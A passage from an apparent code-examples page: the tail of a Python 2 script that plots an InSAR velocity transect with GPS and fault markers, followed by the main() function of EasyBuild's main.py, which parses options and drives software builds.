   # pl.fill_between(x, y-error, y+error,alpha=0.6, facecolor='0.20')
   # print transect
#############################################################################

    fig2, axes2 = plt.subplots(nrows=1)
    axes2.imshow(insarData)
    #for i in range(ntrans):
    axes2.plot([XX0[0], XX1[0]], [YY0[0], YY1[0]], 'k-')
    axes2.plot([XX0[-1], XX1[-1]], [YY0[-1], YY1[-1]], 'k-')
    axes2.plot([XX0[0], XX0[-1]], [YY0[0], YY0[-1]], 'k-')
    axes2.plot([XX1[0], XX1[-1]], [YY1[0], YY1[-1]], 'k-')

    try:
       axes2.plot([Xf0,Xf1],[Yf0,Yf1], 'k-')
    except:
       FaultLine='None'
    

    axes2.plot(GPSx,GPSy,'b^')
    axes2.plot(GPSxx,GPSyy,'k^')
    if gpsFile!='Nogps':
        axes2.plot(IDXref,IDYref,'r^')
    axes2.axis('image')

    figName = 'transect_area.png'
    print 'writing '+figName
    plt.savefig(figName)    

#############################################################################
    fig = plt.figure()
    fig.set_size_inches(10,4)
    ax = plt.Axes(fig, [0., 0., 1., 1.], )
    ax=fig.add_subplot(111)
    if display_InSAR in ['on','On','ON']:
       ax.plot(D/1000.0,transect*1000,'o',ms=1,mfc='Black', linewidth='0')


############################################################################
# save the profile data:     
    if save_to_mat in ['ON','on','On','yes','y','YES','Yes']:
       import scipy.io as sio
       matFile='transect.mat'
       dataset={}
       dataset['datavec']=transect
       try:
         dataset['lat']=transect_lat
         dataset['lon']=transect_lon
       except:
         dataset['lat']='Nan'
         dataset['lon']='Nan'
       dataset['Unit']='m'
       dataset['Distance_along_profile']=D
       print '*****************************************'
       print ''
       print 'writing transect to >>> '+matFile
       sio.savemat(matFile, {'dataset': dataset})
       print ''
       print '*****************************************'
############################################################################
 #   ax.plot(D/1000.0, avgInSAR*1000, 'r-')
 
#    ax.plot(D/1000.0,transect*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)),'o',ms=1,mfc='Black', linewidth='0')
#    ax.plot(D/1000.0, avgInSAR*1000/(np.sin(23.*np.pi/180.)*np.cos(38.*np.pi/180.0)), 'r-')

#############################################################################
    if display_Standard_deviation in ['on','On','ON']:
 
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR-i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#,color='#DCDCDC')#'LightGrey')
       for i in np.arange(0.0,1.01,0.01):
          ax.plot(D/1000.0, (avgInSAR+i*stdInSAR)*1000, '-',color='#DCDCDC',alpha=0.5)#'LightGrey')
#############################################################################
    if display_Average in ['on','On','ON']:
       ax.plot(D/1000.0, avgInSAR*1000, 'r-')
########### 
  # ax.fill_between(D/1000.0, (avgInSAR-stdInSAR)*1000, (avgInSAR+stdInSAR)*1000,where=(avgInSAR+stdInSAR)*1000>=(avgInSAR-stdInSAR)*1000,alpha=1, facecolor='Red')

    try:      
        ax.plot(DistGPS/1000.0, -1*GPS_in_bound, '^',ms=10,mfc='Cyan')
    except:
        print ''
    ax.set_ylabel('LOS velocity [mm/yr]',fontsize=26)
    ax.set_xlabel('Distance along profile [km]',fontsize=26)


   # print '******************'
   # print 'Dsitance of fault from the beginig of profile(km):'
   # print df0_km/1000.0


    ###################################################################
    #lower and higher bounds for diplaying the profile

    try:
       lbound
       hbound
    except:
       lbound=np.nanmin(transect)*1000
       hbound=np.nanmax(transect)*1000


    ###################################################################
    #To plot the Fault location on the profile
    try:
       ax.plot([df0_km/1000.0,df0_km/1000.0], [lbound,hbound], '--',color='black',linewidth='2')
    except:
       fault_loc='None'

    ###################################################################
    

    try: 
         ax.set_ylim(lbound,hbound)
    except:
         ylim='no'

   # try: 
   #      ax.set_xlim(-10,300)
   # except:
    #     xlim='no'


##########
#Temporary To plot DEM
   # try:
#    majorLocator = MultipleLocator(5)
#    ax.yaxis.set_major_locator(majorLocator)
#    minorLocator   = MultipleLocator(1)
#    ax.yaxis.set_minor_locator(minorLocator)

#    plt.tick_params(which='major', length=15,width=2)
#    plt.tick_params(which='minor', length=6,width=2)

#    try:
#       for tick in ax.xaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#       for tick in ax.yaxis.get_major_ticks():
#                tick.label.set_fontsize(26)
#    
#       plt.tick_params(which='major', length=15,width=2)
#       plt.tick_params(which='minor', length=6,width=2)
#    except:
#       print 'couldn not fix the ticks! '


    figName = 'transect.png'
    print 'writing '+figName
    plt.savefig(figName)
    print ''
    print '________________________________'
#############################################################################
    plt.show()

Example 50

Project: easybuild-framework
Source File: main.py
View license
def main(args=None, logfile=None, do_build=None, testing=False, modtool=None):
    """
    Main function: parse command line options, and act accordingly.
    :param args: command line arguments to use
    :param logfile: log file to use
    :param do_build: whether or not to actually perform the build
    :param testing: enable testing mode
    """
    # purposely session state very early, to avoid modules loaded by EasyBuild meddling in
    init_session_state = session_state()

    # initialise options
    eb_go = eboptions.parse_options(args=args)
    options = eb_go.options
    orig_paths = eb_go.args

    # set umask (as early as possible)
    if options.umask is not None:
        new_umask = int(options.umask, 8)
        old_umask = os.umask(new_umask)

    # set by option parsers via set_tmpdir
    eb_tmpdir = tempfile.gettempdir()

    # initialise logging for main
    global _log
    _log, logfile = init_logging(logfile, logtostdout=options.logtostdout,
                                 silent=(testing or options.terse), colorize=options.color)

    # disallow running EasyBuild as root
    if os.getuid() == 0:
        raise EasyBuildError("You seem to be running EasyBuild with root privileges which is not wise, "
                             "so let's end this here.")

    # log startup info
    eb_cmd_line = eb_go.generate_cmd_line() + eb_go.args
    log_start(eb_cmd_line, eb_tmpdir)

    if options.umask is not None:
        _log.info("umask set to '%s' (used to be '%s')" % (oct(new_umask), oct(old_umask)))

    # process software build specifications (if any), i.e.
    # software name/version, toolchain name/version, extra patches, ...
    (try_to_generate, build_specs) = process_software_build_specs(options)

    search_query = options.search or options.search_filename or options.search_short

    # determine robot path
    # --try-X, --dep-graph, --search use robot path for searching, so enable it with path of installed easyconfigs
    tweaked_ecs = try_to_generate and build_specs
    tweaked_ecs_path, pr_path = alt_easyconfig_paths(eb_tmpdir, tweaked_ecs=tweaked_ecs, from_pr=options.from_pr)
    auto_robot = try_to_generate or options.check_conflicts or options.dep_graph or search_query
    robot_path = det_robot_path(options.robot_paths, tweaked_ecs_path, pr_path, auto_robot=auto_robot)
    _log.debug("Full robot path: %s" % robot_path)

    # configure & initialize build options
    config_options_dict = eb_go.get_options_by_section('config')
    build_options = {
        'build_specs': build_specs,
        'command_line': eb_cmd_line,
        'external_modules_metadata': parse_external_modules_metadata(options.external_modules_metadata),
        'pr_path': pr_path,
        'robot_path': robot_path,
        'silent': testing,
        'try_to_generate': try_to_generate,
        'valid_stops': [x[0] for x in EasyBlock.get_steps()],
    }
    # initialise the EasyBuild configuration & build options
    config.init(options, config_options_dict)
    config.init_build_options(build_options=build_options, cmdline_options=options)

    if modtool is None:
        modtool = modules_tool(testing=testing)

    if options.last_log:
        # print location to last log file, and exit
        last_log = find_last_log(logfile) or '(none)'
        print_msg(last_log, log=_log, prefix=False)

    # check whether packaging is supported when it's being used
    if options.package:
        check_pkg_support()
    else:
        _log.debug("Packaging not enabled, so not checking for packaging support.")

    # search for easyconfigs, if a query is specified
    if search_query:
        search_easyconfigs(search_query, short=options.search_short, filename_only=options.search_filename,
                           terse=options.terse)

    # GitHub options that warrant a silent cleanup & exit
    if options.check_github:
        check_github()

    elif options.install_github_token:
        install_github_token(options.github_user, silent=build_option('silent'))

    elif options.review_pr:
        print review_pr(options.review_pr, colored=use_color(options.color))

    elif options.list_installed_software:
        detailed = options.list_installed_software == 'detailed'
        print list_software(output_format=options.output_format, detailed=detailed, only_installed=True)

    elif options.list_software:
        print list_software(output_format=options.output_format, detailed=options.list_software == 'detailed')

    # non-verbose cleanup after handling GitHub integration stuff or printing terse info
    early_stop_options = [
        options.check_github,
        options.install_github_token,
        options.list_installed_software,
        options.list_software,
        options.review_pr,
        options.terse,
    ]
    if any(early_stop_options):
        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # update session state
    eb_config = eb_go.generate_cmd_line(add_default=True)
    modlist = modtool.list()  # build options must be initialized first before 'module list' works
    init_session_state.update({'easybuild_configuration': eb_config})
    init_session_state.update({'module_list': modlist})
    _log.debug("Initial session state: %s" % init_session_state)

    # determine easybuild-easyconfigs package install path
    easyconfigs_pkg_paths = get_paths_for(subdir=EASYCONFIGS_PKG_SUBDIR)
    if not easyconfigs_pkg_paths:
        _log.warning("Failed to determine install path for easybuild-easyconfigs package.")

    if options.install_latest_eb_release:
        if orig_paths:
            raise EasyBuildError("Installing the latest EasyBuild release can not be combined with installing "
                                 "other easyconfigs")
        else:
            eb_file = find_easybuild_easyconfig()
            orig_paths.append(eb_file)

    categorized_paths = categorize_files_by_type(orig_paths)

    # command line options that do not require any easyconfigs to be specified
    no_ec_opts = [options.aggregate_regtest, options.new_pr, options.regtest, options.update_pr, search_query]

    # determine paths to easyconfigs
    paths = det_easyconfig_paths(categorized_paths['easyconfigs'])
    if paths:
        # transform paths into tuples, use 'False' to indicate the corresponding easyconfig files were not generated
        paths = [(p, False) for p in paths]
    else:
        if 'name' in build_specs:
            # try to obtain or generate an easyconfig file via build specifications if a software name is provided
            paths = find_easyconfigs_by_specs(build_specs, robot_path, try_to_generate, testing=testing)
        elif not any(no_ec_opts):
            print_error(("Please provide one or multiple easyconfig files, or use software build "
                         "options to make EasyBuild search for easyconfigs"),
                        log=_log, opt_parser=eb_go.parser, exit_on_error=not testing)
    _log.debug("Paths: %s" % paths)

    # run regtest
    if options.regtest or options.aggregate_regtest:
        _log.info("Running regression test")
        # fallback: easybuild-easyconfigs install path
        regtest_ok = regtest([path[0] for path in paths] or easyconfigs_pkg_paths, modtool)
        if not regtest_ok:
            _log.info("Regression test failed (partially)!")
            sys.exit(31)  # exit -> 3x1t -> 31

    # read easyconfig files
    easyconfigs, generated_ecs = parse_easyconfigs(paths)

    # tweak obtained easyconfig files, if requested
    # don't try and tweak anything if easyconfigs were generated, since building a full dep graph will fail
    # if easyconfig files for the dependencies are not available
    if try_to_generate and build_specs and not generated_ecs:
        easyconfigs = tweak(easyconfigs, build_specs, modtool, targetdir=tweaked_ecs_path)

    dry_run_mode = options.dry_run or options.dry_run_short
    new_update_pr = options.new_pr or options.update_pr

    # skip modules that are already installed unless forced
    if not (options.force or options.rebuild or dry_run_mode or options.extended_dry_run or new_update_pr):
        retained_ecs = skip_available(easyconfigs, modtool)
        if not testing:
            for skipped_ec in [ec for ec in easyconfigs if ec not in retained_ecs]:
                print_msg("%s is already installed (module found), skipping" % skipped_ec['full_mod_name'])
        easyconfigs = retained_ecs

    # determine an order that will allow all specs in the set to build
    if len(easyconfigs) > 0:
        # resolve dependencies if robot is enabled, except in dry run mode
        # one exception: deps *are* resolved with --new-pr or --update-pr when dry run mode is enabled
        if options.robot and (not dry_run_mode or new_update_pr):
            print_msg("resolving dependencies ...", log=_log, silent=testing)
            ordered_ecs = resolve_dependencies(easyconfigs, modtool)
        else:
            ordered_ecs = easyconfigs
    elif new_update_pr:
        ordered_ecs = None
    else:
        print_msg("No easyconfigs left to be built.", log=_log, silent=testing)
        ordered_ecs = []

    # creating/updating PRs
    if new_update_pr:
        if options.new_pr:
            new_pr(categorized_paths, ordered_ecs, title=options.pr_title, descr=options.pr_descr,
                   commit_msg=options.pr_commit_msg)
        else:
            update_pr(options.update_pr, categorized_paths, ordered_ecs, commit_msg=options.pr_commit_msg)

        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # dry_run: print all easyconfigs and dependencies, and whether they are already built
    elif dry_run_mode:
        txt = dry_run(easyconfigs, modtool, short=not options.dry_run)
        print_msg(txt, log=_log, silent=testing, prefix=False)

    elif options.check_conflicts:
        if check_conflicts(easyconfigs, modtool):
            print_error("One or more conflicts detected!")
            sys.exit(1)
        else:
            print_msg("\nNo conflicts detected!\n", prefix=False)

    # dump source script to set up build environment
    elif options.dump_env_script:
        dump_env_script(easyconfigs)

    # cleanup and exit after dry run, searching easyconfigs or submitting regression test
    if any(no_ec_opts + [options.check_conflicts, dry_run_mode, options.dump_env_script]):
        cleanup(logfile, eb_tmpdir, testing)
        sys.exit(0)

    # create dependency graph and exit
    if options.dep_graph:
        _log.info("Creating dependency graph %s" % options.dep_graph)
        dep_graph(options.dep_graph, ordered_ecs)
        cleanup(logfile, eb_tmpdir, testing, silent=True)
        sys.exit(0)

    # submit build as job(s), clean up and exit
    if options.job:
        submit_jobs(ordered_ecs, eb_go.generate_cmd_line(), testing=testing)
        if not testing:
            print_msg("Submitted parallel build jobs, exiting now")
            cleanup(logfile, eb_tmpdir, testing)
            sys.exit(0)

    # build software, will exit when errors occurs (except when testing)
    exit_on_failure = not options.dump_test_report and not options.upload_test_report
    if not testing or (testing and do_build):
        ecs_with_res = build_and_install_software(ordered_ecs, init_session_state, exit_on_failure=exit_on_failure)
    else:
        ecs_with_res = [(ec, {}) for ec in ordered_ecs]

    correct_builds_cnt = len([ec_res for (_, ec_res) in ecs_with_res if ec_res.get('success', False)])
    overall_success = correct_builds_cnt == len(ordered_ecs)
    success_msg = "Build succeeded for %s out of %s" % (correct_builds_cnt, len(ordered_ecs))

    repo = init_repository(get_repository(), get_repositorypath())
    repo.cleanup()

    # dump/upload overall test report
    test_report_msg = overall_test_report(ecs_with_res, len(paths), overall_success, success_msg, init_session_state)
    if test_report_msg is not None:
        print_msg(test_report_msg)

    print_msg(success_msg, log=_log, silent=testing)

    # cleanup and spec files
    for ec in easyconfigs:
        if 'original_spec' in ec and os.path.isfile(ec['spec']):
            os.remove(ec['spec'])

    # stop logging and cleanup tmp log file, unless one build failed (individual logs are located in eb_tmpdir)
    stop_logging(logfile, logtostdout=options.logtostdout)
    if overall_success:
        cleanup(logfile, eb_tmpdir, testing)